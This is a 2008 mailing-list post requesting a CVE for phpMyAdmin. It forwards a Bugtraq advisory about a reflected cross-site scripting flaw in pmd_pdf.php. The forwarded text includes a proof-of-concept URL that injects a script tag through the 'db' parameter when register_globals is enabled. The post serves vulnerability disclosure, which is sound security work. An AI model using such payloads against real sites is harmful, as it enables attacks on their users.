27 Oct 23:28
CVE request phpmyadmin (Fwd: XSS in phpMyadmin)
No fix yet, works also in 3.0.1. ---------- Weitergeleitete Nachricht ---------- Subject: XSS in phpMyadmin Date: Montag 27 Oktober 2008 From: hadikiamarsi@... To: bugtraq@... Author : Hadi Kiamarsi ------------------------------------------- Discovered by : Hadi Kiamarsi ------------------------------------------- Exploited By : Hadi Kiamarsi ------------------------------------------- E-Mail : hadikiamarsi[at]hotmail.com ------------------------------------------- web site : www.ircrash.com ------------------------------------------- members team : Hadi Kiamarsi - khashayar fereidani - sina yazdanmehr ------------------------------------------- Sript Name : phpmyadmin ( All version ) Download Script : http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-3.0.0-all-languages.zip?download ------------------------------------------- XSS Exploit : register_globals=on query : http://[www.example.com]/pmd_pdf.php?db=>"><script>alert('Hadi-Kiamarsi')</script> ------------------------------------------------------- -- -- Hanno Böck Blog: http://www.hboeck.de/ GPG: 3DBD3B20 Jabber/Mail: hanno@... http://x1000malquer.de/ - ab 8.11. Atomtransporte stoppen
RSS Feed